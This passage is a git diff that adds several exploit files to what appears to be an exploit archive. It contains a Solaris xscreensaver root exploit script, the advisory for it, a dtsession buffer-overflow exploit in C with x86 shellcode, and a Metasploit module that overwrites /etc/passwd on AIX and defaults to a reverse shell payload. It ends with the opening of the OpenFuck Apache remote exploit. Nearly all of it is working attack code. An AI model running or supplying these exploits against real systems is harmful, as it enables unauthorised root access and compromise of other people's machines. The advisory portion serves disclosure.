+		fprintf(stderr, "Error: %s contains a 0x00!\n", pattern);
+		exit(1);
+	}
+}
+
+/*
+ * search_ldso(): search for a symbol inside ld.so.1
+ */
+int search_ldso(char *sym)
+{
+	int		addr;
+	void		*handle;
+	Link_map	*lm;
+
+	/* open the executable object file */
+	if ((handle = dlmopen(LM_ID_LDSO, NULL, RTLD_LAZY)) == NULL) {
+		perror("dlopen");
+		exit(1);
+	}
+
+	/* get dynamic load information */
+	if ((dlinfo(handle, RTLD_DI_LINKMAP, &lm)) == -1) {
+		perror("dlinfo");
+		exit(1);
+	}
+
+	/* search for the address of the symbol */
+	if ((addr = (int)dlsym(handle, sym)) == NULL) {
+		fprintf(stderr, "sorry, function %s() not found\n", sym);
+		exit(1);
+	}
+
+	/* close the executable object file */
+	dlclose(handle);
+
+	check_zero(addr - 4, sym);
+	return(addr);
+}
+
+/*
+ * search_rwx_mem(): search for an RWX memory segment valid for all
+ * programs (typically, /usr/lib/ld.so.1) using the proc filesystem
+ */
+int search_rwx_mem(void)
+{
+	int	fd;
+	char	tmp[16];
+	prmap_t	map;
+	int	addr = 0, addr_old;
+
+	/* open the proc filesystem */
+	sprintf(tmp,"/proc/%d/map", (int)getpid());
+	if ((fd = open(tmp, O_RDONLY)) < 0) {
+		fprintf(stderr, "can't open %s\n", tmp);
+		exit(1);
+	}
+
+	/* search for the last RWX memory segment before stack (last - 1) */
+	while (read(fd, &map, sizeof(map)))
+		if (map.pr_vaddr)
+			if (map.pr_mflags & (MA_READ | MA_WRITE | MA_EXEC)) {
+				addr_old = addr;
+				addr = map.pr_vaddr;
+			}
+	close(fd);
+
+	/* add 4 to the exact address NULL bytes */
+	if (!(addr_old & 0xff))
+		addr_old |= 0x04;
+	if (!(addr_old & 0xff00))
+		addr_old |= 0x0400;
+
+	return(addr_old);
+}
+
+/*
+ * set_val(): copy a dword inside a buffer
+ */
+void set_val(char *buf, int pos, int val)
+{
+	buf[pos] =	(val & 0xff000000) >> 24;
+	buf[pos + 1] =	(val & 0x00ff0000) >> 16;
+	buf[pos + 2] =	(val & 0x0000ff00) >> 8;
+	buf[pos + 3] =	(val & 0x000000ff);
+}
\ No newline at end of file
diff --git a/exploits/solaris/local/47509.txt b/exploits/solaris/local/47509.txt
new file mode 100644
index 000000000..3edf18c11
--- /dev/null
+++ b/exploits/solaris/local/47509.txt
@@ -0,0 +1,81 @@
+# Exploit Title: Solaris xscreensaver 11.4 - Privilege Escalation
+# Date: 2019-10-16
+# Exploit Author: Marco Ivaldi
+# Vendor Homepage: https://www.oracle.com/technetwork/server-storage/solaris11/
+# Version: Solaris 11.x
+# Tested on: Solaris 11.4 and 11.3 X86
+# CVE: N/A
+
+#!/bin/sh
+
+#
+# raptor_xscreensaver - Solaris 11.x LPE via xscreensaver
+# Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>
+#
+# Exploitation of a design error vulnerability in xscreensaver, as 
+# distributed with Solaris 11.x, allows local attackers to create
+# (or append to) arbitrary files on the system, by abusing the -log
+# command line switch introduced in version 5.06. This flaw can be
+# leveraged to cause a denial of service condition or to escalate
+# privileges to root. This is a Solaris-specific vulnerability,
+# caused by the fact that Oracle maintains a slightly different
+# codebase from the upstream one (CVE-2019-3010).
+#
+# "I'd rather be lucky than good any day." -- J. R. "Bob" Dobbs
+# "Good hackers force luck." -- ~A.
+#
+# This exploit targets the /usr/lib/secure/ directory in order
+# to escalate privileges with the LD_PRELOAD technique. The
+# implementation of other exploitation vectors, including those
+# that do not require gcc to be present on the target system, is
+# left as an exercise to fellow UNIX hackers;)
+#
+# Usage:
+# raptor@stalker:~$ chmod +x raptor_xscreensaver
+# raptor@stalker:~$ ./raptor_xscreensaver
+# [...]
+# Oracle Corporation      SunOS 5.11      11.4    Aug 2018
+# root@stalker:~# id
+# uid=0(root) gid=0(root)
+# root@stalker:~# rm /usr/lib/secure/64/getuid.so /tmp/getuid.*
+#
+# Vulnerable platforms:
+# Oracle Solaris 11 X86 [tested on 11.4 and 11.3]
+# Oracle Solaris 11 SPARC [untested]
+#
+
+echo "raptor_xscreensaver - Solaris 11.x LPE via xscreensaver"
+echo "Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>"
+echo
+
+# prepare the payload
+echo "int getuid(){return 0;}" > /tmp/getuid.c
+gcc -fPIC -Wall -g -O2 -shared -o /tmp/getuid.so /tmp/getuid.c -lc
+if [ $? -ne 0 ]; then
+	echo "error: problem compiling the shared library, check your gcc"
+	exit 1
+fi
+
+# check the architecture
+LOG=/usr/lib/secure/getuid.so
+file /bin/su | grep 64-bit >/dev/null 2>&1
+if [ $? -eq 0 ]; then
+	LOG=/usr/lib/secure/64/getuid.so
+fi
+
+# start our own xserver
+# alternatively we can connect back to a valid xserver (e.g. xquartz)
+/usr/bin/Xorg :1 &
+
+# trigger the bug
+umask 0
+/usr/bin/xscreensaver -display :1 -log $LOG &
+sleep 5
+
+# clean up
+pkill -n xscreensaver
+pkill -n Xorg
+
+# LD_PRELOAD-fu
+cp /tmp/getuid.so $LOG
+LD_PRELOAD=$LOG su -
\ No newline at end of file
diff --git a/exploits/solaris/local/47529.txt b/exploits/solaris/local/47529.txt
new file mode 100644
index 000000000..0288c5fa6
--- /dev/null
+++ b/exploits/solaris/local/47529.txt
@@ -0,0 +1,168 @@
+@Mediaservice.net Security Advisory #2019-02 (last updated on 2019-10-16)
+
+         Title:  Local privilege escalation on Solaris 11.x via xscreensaver
+   Application:  Jamie Zawinski's xscreensaver 5.39 distributed with Solaris 11.4
+    Jamie Zawinski's xscreensaver 5.15 distributed with Solaris 11.3
+    Other versions starting from 5.06 are potentially affected
+     Platforms:  Oracle Solaris 11.x (tested on 11.4 and 11.3)
+    Other platforms are potentially affected (see below)
+   Description:  A local attacker can gain root privileges by exploiting a
+    design error vulnerability in the xscreensaver distributed with
+    Solaris
+        Author:  Marco Ivaldi <marco.ivaldi@mediaservice.net>
+ Vendor Status:  <secalert_us@oracle.com> notified on 2019-07-09
+      CVE Name:  CVE-2019-3010
+   CVSS Vector:  CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H (Base Score: 8.8)
+    References: https://lab.mediaservice.net/advisory/2019-02-solaris-xscreensaver.txt
+    https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html
+    https://www.jwz.org/xscreensaver/
+    https://www.oracle.com/technetwork/server-storage/solaris11/
+    https://www.mediaservice.net/
+    https://0xdeadbeef.info/
+
+1. Abstract.
+
+Exploitation of a design error vulnerability in xscreensaver, as distributed
+with Solaris 11.x, allows local attackers to create (or append to) arbitrary
+files on the system, by abusing the -log command line switch introduced in
+version 5.06. This flaw can be leveraged to cause a denial of service condition
+or to escalate privileges to root.
+
+2. Example Attack Session.
+
+raptor@stalker:~$ cat /etc/release
+                             Oracle Solaris 11.4 X86
+  Copyright (c) 1983, 2018, Oracle and/or its affiliates.  All rights reserved.
+                            Assembled 16 August 2018
+raptor@stalker:~$ uname -a
+SunOS stalker 5.11 11.4.0.15.0 i86pc i386 i86pc
+raptor@stalker:~$ id
+uid=100(raptor) gid=10(staff)
+raptor@stalker:~$ chmod +x raptor_xscreensaver
+raptor@stalker:~$ ./raptor_xscreensaver
+raptor_xscreensaver - Solaris 11.x LPE via xscreensaver
+Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>
+[...]
+Oracle Corporation      SunOS 5.11      11.4    Aug 2018
+root@stalker:~# id
+uid=0(root) gid=0(root)
+
+3. Affected Platforms.
+
+This vulnerability was confirmed on the following platforms:
+
+* Oracle Solaris 11.x X86 [tested on 11.4 and 11.3, default installation]
+* Oracle Solaris 11.x SPARC [untested]
+
+Previous Oracle Solaris 11 versions might also be vulnerable.
+
+Based on our analysis and on feedback kindly provided by Alan Coopersmith of
+Oracle, we concluded that this is a Solaris-specific vulnerability, caused by
+the fact that Oracle maintains a slightly different codebase from the upstream
+one. Alan explained this as follows:
+
+"The problem in question here appears to be inherited from the long-ago fork
+[originally based on xscreensaver 4.05] Sun & Ximian did to add a gtk-based
+unlock dialog with accessibility support to replace the non-accessible Xlib
+unlock dialog that upstream provides, which moves the uid reset to after where
+the log file opening was later added."
+
+Specifically, the problem arises because of this bit of Solaris patches:
+https://github.com/oracle/solaris-userland/blob/18c7129a50c0d736cbac04dcfbfa1502eab71e33/components/desktop/xscreensaver/patches/0005-gtk-lock.patch#L3749-L3770
+
+As an interesting side note, it appears Red Hat dropped this code back in 2002
+with version 4.05-5:
+https://src.fedoraproject.org/rpms/xscreensaver/blob/9a0bab5a19b03db9671fc5a20714755445f19e21/f/xscreensaver.spec#L2178-2179
+
+4. Fix.
+
+Oracle has assigned the tracking# S1182608 and has released a fix for all
+affected and supported versions of Solaris in their Critical Patch Update (CPU)
+of October 2019.
+
+As a temporary workaround, it is also possible to remove the setuid bit from
+the xscreensaver executable as follows (note that this might prevent it from
+working properly):
+
+bash-3.2# chmod -s /usr/bin/xscreensaver
+
+5. Proof of Concept.
+
+An exploit for Oracle Solaris 11.x has been developed as a proof of concept. It
+can be downloaded from:
+
+https://github.com/0xdea/exploits/blob/master/solaris/raptor_xscreensaver
+
+#!/bin/sh
+
+#
+# raptor_xscreensaver - Solaris 11.x LPE via xscreensaver
+# Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>
+#
+# Exploitation of a design error vulnerability in xscreensaver, as 
+# distributed with Solaris 11.x, allows local attackers to create
+# (or append to) arbitrary files on the system, by abusing the -log
+# command line switch introduced in version 5.06. This flaw can be
+# leveraged to cause a denial of service condition or to escalate
+# privileges to root. This is a Solaris-specific vulnerability,
+# caused by the fact that Oracle maintains a slightly different
+# codebase from the upstream one (CVE-2019-3010).
+#
+# "I'd rather be lucky than good any day." -- J. R. "Bob" Dobbs
+# "Good hackers force luck." -- ~A.
+#
+# This exploit targets the /usr/lib/secure/ directory in order
+# to escalate privileges with the LD_PRELOAD technique. The
+# implementation of other exploitation vectors, including those
+# that do not require gcc to be present on the target system, is
+# left as an exercise to fellow UNIX hackers;)
+#
+# Usage:
+# raptor@stalker:~$ chmod +x raptor_xscreensaver
+# raptor@stalker:~$ ./raptor_xscreensaver
+# [...]
+# Oracle Corporation      SunOS 5.11      11.4    Aug 2018
+# root@stalker:~# id
+# uid=0(root) gid=0(root)
+# root@stalker:~# rm /usr/lib/secure/64/getuid.so /tmp/getuid.*
+#
+# Vulnerable platforms:
+# Oracle Solaris 11 X86 [tested on 11.4 and 11.3]
+# Oracle Solaris 11 SPARC [untested]
+#
+
+echo "raptor_xscreensaver - Solaris 11.x LPE via xscreensaver"
+echo "Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>"
+echo
+
+# prepare the payload
+echo "int getuid(){return 0;}" > /tmp/getuid.c
+gcc -fPIC -Wall -g -O2 -shared -o /tmp/getuid.so /tmp/getuid.c -lc
+if [ $? -ne 0 ]; then
+echo "error: problem compiling the shared library, check your gcc"
+exit 1
+fi
+
+# check the architecture
+LOG=/usr/lib/secure/getuid.so
+file /bin/su | grep 64-bit >/dev/null 2>&1
+if [ $? -eq 0 ]; then
+LOG=/usr/lib/secure/64/getuid.so
+fi
+
+# start our own xserver
+# alternatively we can connect back to a valid xserver (e.g. xquartz)
+/usr/bin/Xorg :1 &
+
+# trigger the bug
+umask 0
+/usr/bin/xscreensaver -display :1 -log $LOG &
+sleep 5
+
+# clean up
+pkill -n xscreensaver
+pkill -n Xorg
+
+# LD_PRELOAD-fu
+cp /tmp/getuid.so $LOG
+LD_PRELOAD=$LOG su -
\ No newline at end of file
diff --git a/exploits/solaris/local/47932.c b/exploits/solaris/local/47932.c
new file mode 100644
index 000000000..2714b3840
--- /dev/null
+++ b/exploits/solaris/local/47932.c
@@ -0,0 +1,291 @@
+# Exploit: SunOS 5.10 Generic_147148-26 - Local Privilege Escalation
+# Date: 2020-01-15
+# Author: Marco Ivaldi
+# Vendor: www.oracle.com
+# Software Link: https://www.oracle.com/technetwork/server-storage/solaris10/downloads/latest-release/index.html
+# CVE: CVE-2020-2696
+
+/*
+ * raptor_dtsession_ipa.c - CDE dtsession LPE for Solaris/Intel
+ * Copyright (c) 2019-2020 Marco Ivaldi <raptor@0xdeadbeef.info>
+ *
+ * A buffer overflow in the CheckMonitor() function in the Common Desktop
+ * Environment 2.3.1 and earlier and 1.6 and earlier, as distributed with
+ * Oracle Solaris 10 1/13 (Update 11) and earlier, allows local users to gain
+ * root privileges via a long palette name passed to dtsession in a malicious
+ * .Xdefaults file (CVE-2020-2696).
+ *
+ * "I always loved Sun because it was so easy to own. Now with Solaris 11 I
+ * don't like it anymore." -- ~B.
+ *
+ * This exploit uses the ret-into-ld.so technique to bypass the non-exec stack
+ * protection. In case troubles arise with NULL-bytes inside the ld.so.1 memory
+ * space, try returning to sprintf() instead of strcpy().
+ *
+ * I haven't written a Solaris/SPARC version because I don't have a SPARC box
+ * on which Solaris 10 can run. If anybody is kind enough to give me access to
+ * such a box, I'd be happy to port my exploit to Solaris/SPARC as well.
+ *
+ * Usage:
+ * $ gcc raptor_dtsession_ipa.c -o raptor_dtsession_ipa -Wall
+ * [on your xserver: disable the access control]
+ * $ ./raptor_dtsession_ipa 192.168.1.1:0
+ * [...]
+ * # id
+ * uid=0(root) gid=1(other)
+ * #
+ *
+ * Tested on:
+ * SunOS 5.10 Generic_147148-26 i86pc i386 i86pc (Solaris 10 1/13)
+ * [previous Solaris versions are also likely vulnerable]
+ */
+
+#include <fcntl.h>
+#include <link.h>
+#include <procfs.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <strings.h>
+#include <unistd.h>
+#include <sys/stat.h>
+#include <sys/systeminfo.h>
+#include <sys/types.h>
+
+#define INFO1	"raptor_dtsession_ipa.c - CDE dtsession LPE for Solaris/Intel"
+#define INFO2	"Copyright (c) 2019-2020 Marco Ivaldi <raptor@0xdeadbeef.info>"
+
+#define	VULN	"/usr/dt/bin/dtsession"		// the vulnerable program
+#define	BUFSIZE	256				// size of the palette name
+#define PADDING	3				// padding in the palette name
+#define PAYSIZE	1024				// size of the payload
+#define OFFSET	env_len / 2			// offset to the shellcode
+
+char sc[] = /* Solaris/x86 shellcode (8 + 8 + 27 = 43 bytes) */
+/* double setuid() */
+"\x31\xc0\x50\x50\xb0\x17\xcd\x91"
+"\x31\xc0\x50\x50\xb0\x17\xcd\x91"
+/* execve() */
+"\x31\xc0\x50\x68/ksh\x68/bin"
+"\x89\xe3\x50\x53\x89\xe2\x50"
+"\x52\x53\xb0\x3b\x50\xcd\x91";
+
+/* globals */
+char	*env[256];
+int	env_pos = 0, env_len = 0;
+
+/* prototypes */
+int	add_env(char *string);
+void	check_zero(int addr, char *pattern);
+int	search_ldso(char *sym);
+int	search_rwx_mem(void);
+void	set_val(char *buf, int pos, int val);
+
+/*
+ * main()
+ */
+int main(int argc, char **argv)
+{
+	char	buf[BUFSIZE], payload[PAYSIZE];
+	char	platform[256], release[256], display[256];
+	int	i, payaddr;
+
+	char	*arg[2] = {"foo", NULL};
+	int	sb = ((int)argv[0] | 0xfff);	/* stack base */
+	int	ret = search_ldso("strcpy");	/* or sprintf */
+	int	rwx_mem = search_rwx_mem();	/* rwx memory */
+
+	FILE	*fp;
+	char	palette_file[BUFSIZE + 18];
+
+	/* print exploit information */
+	fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);
+
+	/* read command line */
+	if (argc != 2) {
+		fprintf(stderr, "usage: %s xserver:display\n\n", argv[0]);
+		exit(1);
+	}
+	sprintf(display, "DISPLAY=%s", argv[1]);
+
+	/* prepare the payload (NOPs suck, but I'm too old for VOODOO stuff) */
+	memset(payload, '\x90', PAYSIZE);
+	payload[PAYSIZE - 1] = 0x0;
+	memcpy(&payload[PAYSIZE - sizeof(sc)], sc, sizeof(sc));
+
+	/* fill the envp, keeping padding */
+	add_env(payload);
+	add_env(display);
+	add_env("HOME=/tmp");
+	add_env(NULL);
+
+	/* calculate the payload address */
+	payaddr = sb - OFFSET;
+
+	/* prepare the evil palette name */
+	memset(buf, 'A', sizeof(buf));
+	buf[sizeof(buf) - 1] = 0x0;
+
+	/* fill with function address in ld.so.1, saved eip, and arguments */
+	for (i = PADDING; i < BUFSIZE - 16; i += 4) {
+		set_val(buf, i, ret);		/* strcpy */
+		set_val(buf, i += 4, rwx_mem);	/* saved eip */
+		set_val(buf, i += 4, rwx_mem);	/* 1st argument */
+		set_val(buf, i += 4, payaddr);	/* 2nd argument */
+	}
+
+	/* prepare the evil .Xdefaults file */
+	fp = fopen("/tmp/.Xdefaults", "w");
+	if (!fp) {
+		perror("error creating .Xdefaults file");
+		exit(1);
+	}
+	fprintf(fp, "*0*ColorPalette: %s\n", buf); // or *0*MonochromePalette
+	fclose(fp);
+
+	/* prepare the evil palette file (badchars currently not handled) */
+	mkdir("/tmp/.dt", 0755);
+	mkdir("/tmp/.dt/palettes", 0755);
+	sprintf(palette_file, "/tmp/.dt/palettes/%s", buf);
+	fp = fopen(palette_file, "w");
+	if (!fp) {
+		perror("error creating palette file");
+		exit(1);
+	}
+	fprintf(fp, "Black\n");
+	fclose(fp);
+
+	/* print some output */
+	sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1);
+	sysinfo(SI_RELEASE, release, sizeof(release) - 1);
+	fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release);
+	fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb);
+	fprintf(stderr, "Using rwx_mem address\t: 0x%p\n", (void *)rwx_mem);
+	fprintf(stderr, "Using payload address\t: 0x%p\n", (void *)payaddr);
+	fprintf(stderr, "Using strcpy() address\t: 0x%p\n\n", (void *)ret);
+
+	/* run the vulnerable program */
+	execve(VULN, arg, env);
+	perror("execve");
+	exit(0);
+}
+
+/*
+ * add_env(): add a variable to envp and pad if needed
+ */
+int add_env(char *string)
+{
+	int	i;
+
+	/* null termination */
+	if (!string) {
+		env[env_pos] = NULL;
+		return env_len;
+	}
+
+	/* add the variable to envp */
+	env[env_pos] = string;
+	env_len += strlen(string) + 1;
+	env_pos++;
+
+	/* pad the envp using zeroes */
+	if ((strlen(string) + 1) % 4)
+		for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) {
+			env[env_pos] = string + strlen(string);
+			env_len++;
+		}
+
+	return env_len;
+}
+
+/*
+ * check_zero(): check an address for the presence of a 0x00
+ */
+void check_zero(int addr, char *pattern)
+{
+	if (!(addr & 0xff) || !(addr & 0xff00) || !(addr & 0xff0000) ||
+	    !(addr & 0xff000000)) {
+		fprintf(stderr, "Error: %s contains a 0x00!\n", pattern);
+		exit(1);
+	}
+}
+
+/*
+ * search_ldso(): search for a symbol inside ld.so.1
+ */
+int search_ldso(char *sym)
+{
+	int		addr;
+	void		*handle;
+	Link_map	*lm;
+
+	/* open the executable object file */
+	if ((handle = dlmopen(LM_ID_LDSO, NULL, RTLD_LAZY)) == NULL) {
+		perror("dlopen");
+		exit(1);
+	}
+
+	/* get dynamic load information */
+	if ((dlinfo(handle, RTLD_DI_LINKMAP, &lm)) == -1) {
+		perror("dlinfo");
+		exit(1);
+	}
+
+	/* search for the address of the symbol */
+	if ((addr = (int)dlsym(handle, sym)) == NULL) {
+		fprintf(stderr, "sorry, function %s() not found\n", sym);
+		exit(1);
+	}
+
+	/* close the executable object file */
+	dlclose(handle);
+
+	check_zero(addr - 4, sym);
+	return addr;
+}
+
+/*
+ * search_rwx_mem(): search for an RWX memory segment valid for all
+ * programs (typically, /usr/lib/ld.so.1) using the proc filesystem
+ */
+int search_rwx_mem(void)
+{
+	int	fd;
+	char	tmp[16];
+	prmap_t	map;
+	int	addr = 0, addr_old;
+
+	/* open the proc filesystem */
+	sprintf(tmp,"/proc/%d/map", (int)getpid());
+	if ((fd = open(tmp, O_RDONLY)) < 0) {
+		fprintf(stderr, "can't open %s\n", tmp);
+		exit(1);
+	}
+
+	/* search for the last RWX memory segment before stack (last - 1) */
+	while (read(fd, &map, sizeof(map)))
+		if (map.pr_vaddr)
+			if (map.pr_mflags & (MA_READ | MA_WRITE | MA_EXEC)) {
+				addr_old = addr;
+				addr = map.pr_vaddr;
+			}
+	close(fd);
+
+	/* add 4 to the exact address NULL bytes */
+	if (!(addr_old & 0xff))
+		addr_old |= 0x04;
+	if (!(addr_old & 0xff00))
+		addr_old |= 0x0400;
+
+	return addr_old;
+}
+
+/*
+ * set_val(): copy a dword inside a buffer (little endian)
+ */
+void set_val(char *buf, int pos, int val)
+{
+	buf[pos] =	(val & 0x000000ff);
+	buf[pos + 1] =	(val & 0x0000ff00) >> 8;
+	buf[pos + 2] =	(val & 0x00ff0000) >> 16;
+	buf[pos + 3] =	(val & 0xff000000) >> 24;
+}
\ No newline at end of file
diff --git a/exploits/unix/local/47701.rb b/exploits/unix/local/47701.rb
new file mode 100755
index 000000000..ada71b024
--- /dev/null
+++ b/exploits/unix/local/47701.rb
@@ -0,0 +1,222 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = GreatRanking
+
+  include Msf::Post::File
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Xorg X11 Server Local Privilege Escalation',
+      'Description'    => %q(
+        WARNING: Successful execution of this module results in /etc/passwd being overwritten.
+
+        This module is a port of the OpenBSD X11 Xorg exploit to run on AIX.
+
+        A permission check flaw exists for -modulepath and -logfile options when
+        starting Xorg.  This allows unprivileged users that can start the server
+        the ability to elevate privileges and run arbitrary code under root
+        privileges.
+
+        This module has been tested with AIX 7.1 and 7.2, and should also work with 6.1.
+        Due to permission restrictions of the crontab in AIX, this module does not use cron,
+        and instead overwrites /etc/passwd in order to create a new user with root privileges.
+        All currently logged in users need to be included when /etc/passwd is overwritten,
+        else AIX will throw 'Cannot get "LOGNAME" variable' when attempting to change user.
+        The Xorg '-fp' parameter used in the OpenBSD exploit does not work on AIX,
+        and is replaced by '-config', in conjuction with ANSI-C quotes to inject newlines when
+        overwriting /etc/passwd.
+      ),
+      'Author'         =>
+        [
+          'Narendra Shinde', # Discovery and original FreeBSD exploit
+          'Zack Flack <dzflack[at]gmail.com>' # Metasploit module and original AIX exploit
+        ],
+      'License'        => MSF_LICENSE,
+      'DisclosureDate' => 'Oct 25 2018',
+      'Notes'         =>
+        {
+          'SideEffects' => [ CONFIG_CHANGES ]
+        },
+      'References'     =>
+        [
+          ['CVE', '2018-14665'],
+          ['URL', 'https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html'],
+          ['URL', 'https://aix.software.ibm.com/aix/efixes/security/xorg_advisory3.asc'],
+          ['URL', 'https://github.com/dzflack/exploits/blob/master/aix/aixxorg.pl'],
+          ['EDB', '45938']
+        ],
+      'Platform'       => ['unix'],
+      'Arch'           => [ARCH_CMD],
+      'SessionTypes'   => ['shell'],
+      'Payload'        => {
+        'Compat' => {
+          'PayloadType'  => 'cmd',
+          'RequiredCmd'  => 'perl'
+        }
+      },
+      'DefaultOptions' => {
+        'Payload' => 'cmd/unix/reverse_perl'
+      },
+      'Targets'        =>
+        [
+          ['IBM AIX Version 6.1', {}],
+          ['IBM AIX Version 7.1', {}],
+          ['IBM AIX Version 7.2', {}]
+        ],
+      'DefaultTarget'  => 1))
+
+    register_options(
+      [
+        OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
+      ]
+    )
+  end
+
+  def check
+    xorg_path = cmd_exec('command -v Xorg')
+    if !xorg_path.include?('Xorg')
+      print_error('Could not find Xorg executable')
+      return Exploit::CheckCode::Safe
+    end
+
+    ksh93_path = cmd_exec('command -v ksh93')
+    if !ksh93_path.include?('ksh')
+      print_error('Could not find Ksh93 executable')
+      return Exploit::CheckCode::Safe
+    end
+
+    if !xorg_vulnerable?
+      print_error('Xorg version is not vulnerable')
+      return Exploit::CheckCode::Safe
+    end
+
+    return Exploit::CheckCode::Appears
+  end
+
+  def exploit
+    status = check
+
+    if status == Exploit::CheckCode::Safe
+      fail_with(Failure::NotVulnerable, '')
+    end
+
+    if !writable?(datastore['WritableDir'])
+      fail_with(Failure::BadConfig, "#{datastore['WritableDir']} is not writable")
+    end
+
+    xorg_path = cmd_exec('command -v Xorg')
+    ksh93_path = cmd_exec('command -v ksh93')
+
+    xorg_payload = generate_xorg_payload(xorg_path, ksh93_path, datastore['WritableDir'])
+    xorg_script_path = "#{datastore['WritableDir']}/wow.ksh"
+    upload_and_chmodx(xorg_script_path, xorg_payload)
+
+    passwd_backup = "#{datastore['WritableDir']}/passwd.backup"
+    print_status("Backing up /etc/passwd to #{passwd_backup}")
+    cmd_exec("cp /etc/passwd #{passwd_backup}")
+    register_file_for_cleanup(passwd_backup)
+
+    print_status("Executing #{xorg_script_path}")
+    cmd_exec(xorg_script_path)
+    print_status('Checking if we are root')
+
+    if root?
+      shell_payload = %(#!#{ksh93_path}
+#{payload.encoded}
+)
+      shell_script_path = "#{datastore['WritableDir']}/wowee.ksh"
+      upload_and_chmodx(shell_script_path, shell_payload)
+
+      print_status('Executing shell payload')
+      cmd_exec("#{ksh93_path} -c \"echo #{shell_script_path} | su - wow &\"")
+
+      print_status('Restoring original /etc/passwd')
+      cmd_exec("su - wow -c \"cp #{passwd_backup} /etc/passwd\"")
+    else
+      fail_with(Failure::PayloadFailed, '')
+    end
+  end
+
+  def generate_xorg_payload(xorg_path, ksh93_path, writabledir)
+    passwd_file = read_file('/etc/passwd')
+    passwd_array = passwd_file.split("\n")
+
+    print_status('Retrieving currently logged in users')
+    users = cmd_exec('who | cut -d\' \' -f1 | sort | uniq')
+    users << "\n"
+    users_array = users.split("\n")
+
+    logged_in_users = ''
+    if !users_array.empty?
+      users_array.each do |user|
+        user << ':'
+        passwd_array.each do |line|
+          if line.index(user) == 0
+            logged_in_users << '\n'
+            logged_in_users << line
+          end
+        end
+      end
+    end
+
+    passwd_data = "$'#{logged_in_users}\\nwow::0:0::/:/usr/bin/ksh\\n#'"
+
+    subdir_count = writabledir.count('/')
+    relative_passwd = '../' * subdir_count + '../../etc/passwd'
+
+    return %(#!#{ksh93_path}
+    #{xorg_path} -config #{passwd_data} -logfile #{relative_passwd} :1 > /dev/null 2>&1
+)
+  end
+
+  def xorg_vulnerable?
+    version = cmd_exec('lslpp -L | grep -i X11.base.rte | awk \'{ print $2 }\'')
+    print_status("Xorg version is #{version}")
+    semantic_version = Gem::Version.new(version)
+
+    vulnerable_versions = [
+      ['6.1.9.0', '6.1.9.100'],
+      ['7.1.4.0', '7.1.4.30'],
+      ['7.1.5.0', '7.1.5.31'],
+      ['7.2.0.0', '7.2.0.1'],
+      ['7.2.1.0', '7.2.1.0'],
+      ['7.2.2.0', '7.2.2.0'],
+      ['7.2.3.0', '7.2.3.15']
+    ]
+
+    vulnerable_versions.each do |version_pair|
+      if semantic_version >= Gem::Version.new(version_pair[0]) &&
+         semantic_version <= Gem::Version.new(version_pair[1])
+        return true
+      end
+    end
+
+    return false
+  end
+
+  def root?
+    id_output = cmd_exec('su - wow -c "id"')
+
+    if id_output.include?('euid=0') || id_output.include?('uid=0')
+      print_good('Got root!')
+      return true
+    end
+
+    print_error('Not root')
+    false
+  end
+
+  def upload_and_chmodx(path, data)
+    print_status("Writing to #{path}")
+    rm_f(path)
+    write_file(path, data)
+    cmd_exec("chmod 0555 '#{path}'")
+
+    register_file_for_cleanup(path)
+  end
+end
\ No newline at end of file
diff --git a/exploits/unix/remote/47080.c b/exploits/unix/remote/47080.c
new file mode 100644
index 000000000..94f5513dc
--- /dev/null
+++ b/exploits/unix/remote/47080.c
@@ -0,0 +1,973 @@
+/*
+ * OF version r00t VERY PRIV8 spabam
+ * Version: v3.0.4 
+ * Requirements: libssl-dev    ( apt-get install libssl-dev )
+ * Compile with: gcc -o OpenFuck OpenFuck.c -lcrypto
+ * objdump -R /usr/sbin/httpd|grep free to get more targets
+ * #hackarena irc.brasnet.org
+ * Note: if required, host ptrace and replace wget target
+ */
+
+#include <arpa/inet.h>
+#include <netinet/in.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <netdb.h>
+#include <errno.h>
+#include <string.h>
+#include <stdio.h>
+#include <unistd.h>
+
+#include <openssl/ssl.h>
+#include <openssl/rsa.h>
+#include <openssl/x509.h>
+#include <openssl/evp.h>
+
+#include <openssl/rc4.h>
+#include <openssl/md5.h>
+
+#define SSL2_MT_ERROR 0
+#define SSL2_MT_CLIENT_FINISHED 3
+#define SSL2_MT_SERVER_HELLO 4
+#define SSL2_MT_SERVER_VERIFY 5
+#define SSL2_MT_SERVER_FINISHED 6
+#define SSL2_MAX_CONNECTION_ID_LENGTH 16
+
+/* update this if you add architectures */
+#define MAX_ARCH 138
+
+struct archs {
+	char* desc;
+	int func_addr;	/* objdump -R /usr/sbin/httpd | grep free */
+} architectures[] = {
+
+{"Caldera OpenLinux (apache-1.3.26)",0x080920e0},
+{"Cobalt Sun 6.0 (apache-1.3.12)",0x8120f0c},
+{"Cobalt Sun 6.0 (apache-1.3.20)",0x811dcb8},
+{"Cobalt Sun x (apache-1.3.26)",0x8123ac3},
+{"Cobalt Sun x Fixed2 (apache-1.3.26)",0x81233c3},
+{"Conectiva 4 (apache-1.3.6)",0x08075398},
+{"Conectiva 4.1 (apache-1.3.9)",0x0808f2fe},
+{"Conectiva 6 (apache-1.3.14)",0x0809222c},
+{"Conectiva 7 (apache-1.3.12)",0x0808f874},
+{"Conectiva 7 (apache-1.3.19)",0x08088aa0},
+{"Conectiva 7/8 (apache-1.3.26)",0x0808e628},
+{"Conectiva 8 (apache-1.3.22)",0x0808b2d0},
+{"Debian GNU Linux 2.2 Potato (apache_1.3.9-14.1)",0x08095264},
